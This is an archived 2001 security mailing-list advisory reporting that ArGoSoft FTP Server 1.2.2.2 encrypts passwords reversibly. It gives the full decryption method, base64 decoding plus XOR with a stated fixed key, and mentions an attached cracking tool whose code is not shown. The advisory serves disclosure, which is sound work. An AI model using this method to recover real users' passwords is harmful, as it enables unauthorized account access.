ArGoSoft FTP Server 1.2.2.2 Weak password encryption

From: ByteRage (byterageat_private)
Date: Thu Jul 12 2001 - 11:36:53 PDT

Next message: Foldi Tamas: "Re: FreeBSD 4.3 local root"

Previous message: Przemyslaw Frasunek: "Re: FreeBSD 4.3 local root"
Next in thread: ByteRage: "ArGoSoft FTP Server 1.2.2.2 Weak password encryption"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

ArGoSoft FTP Server 1.2.2.2 Weak password encryption

AFFECTED SYSTEMS

ArGoSoft FTP Server 1.2.2.2

DESCRIPTION

ArGoSoft FTP Server 1.2.2.2 for win32 is vulnerable to
decryption of the password file. As a matter of fact
the programmers are aware of this since they have
implemented decryption algorithms within the FTP
Server program itself, as we can find the decrypted
passwords when watching the program's memory dumps, or
using system debuggers or special tools to peek at the
password (User Properties) which is hidden with ****
(normally one would expect this to contain something
like "-=encrypted=-" so that it can only be changed,
but in this case it contains the plaintext password)

This simple observation brings up the fact that the
passwordfile uses a weak password encryption
algorithm, and that the passwords can be obtained from
the ciphertext data.

So, I started studying this program so that I found
the following decryption algorithm :

We have the password in ciphertext : NkouCREIJVU=
1) we lookup the individual ciphertext characters in
   the table 'A'-'Z', 'a'-'z', '0'-'9', '+', '/'
   and take the indices ranging from 0 -> 63
   (these represent 6 bits)
   4 of these characters make up 3 binary bytes
   (4*6 bits = 3*8 bits)
2) we XOR the resulting binary limb with :
  
"T3ZlciB0aGUgaGlsbHMgYW5kIGZhciBhd2F5LCBUZWxldHViYmllcyBjb21lIHRvIHBsYXk="
(we XOR the first byte of our decoded stuff with "T",
the second with "3", etc...)

If we finish these two passes we get : NkouCREIJVU= ->
byterage

I've attached source code that decrypts ciphertext
passwords : you can give them as the first parameter
to the executable, or you can also give it the
filename of an ArGoSoft FTP password file, so that it
gives you the passwords of all users.

IMPACT

When combining this with that *.lnk upload bug I
pointed out earlier, any user with write access can
not only traverse directories but also obtain the
passwords of all users.

VENDOR STATUS

I have sent my findings to supportat_private but
since they use the decryption algorithms within the
FTP Server program themselves, they are aware of the
fact that the password encryption is reversible.
Hopefully they will review the encryption algorithm in
a next release.

====================================================
[ByteRage] byterageat_private [www.byterage.cjb.net]
====================================================


__________________________________________________
Do You Yahoo!?
Get personalized email addresses from Yahoo! Mail
http://personal.mail.yahoo.com/

application/octet-stream attachment: agscrack.c

Next message: Foldi Tamas: "Re: FreeBSD 4.3 local root"
Previous message: Przemyslaw Frasunek: "Re: FreeBSD 4.3 local root"
Next in thread: ByteRage: "ArGoSoft FTP Server 1.2.2.2 Weak password encryption"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Jul 15 2001 - 21:02:38 PDT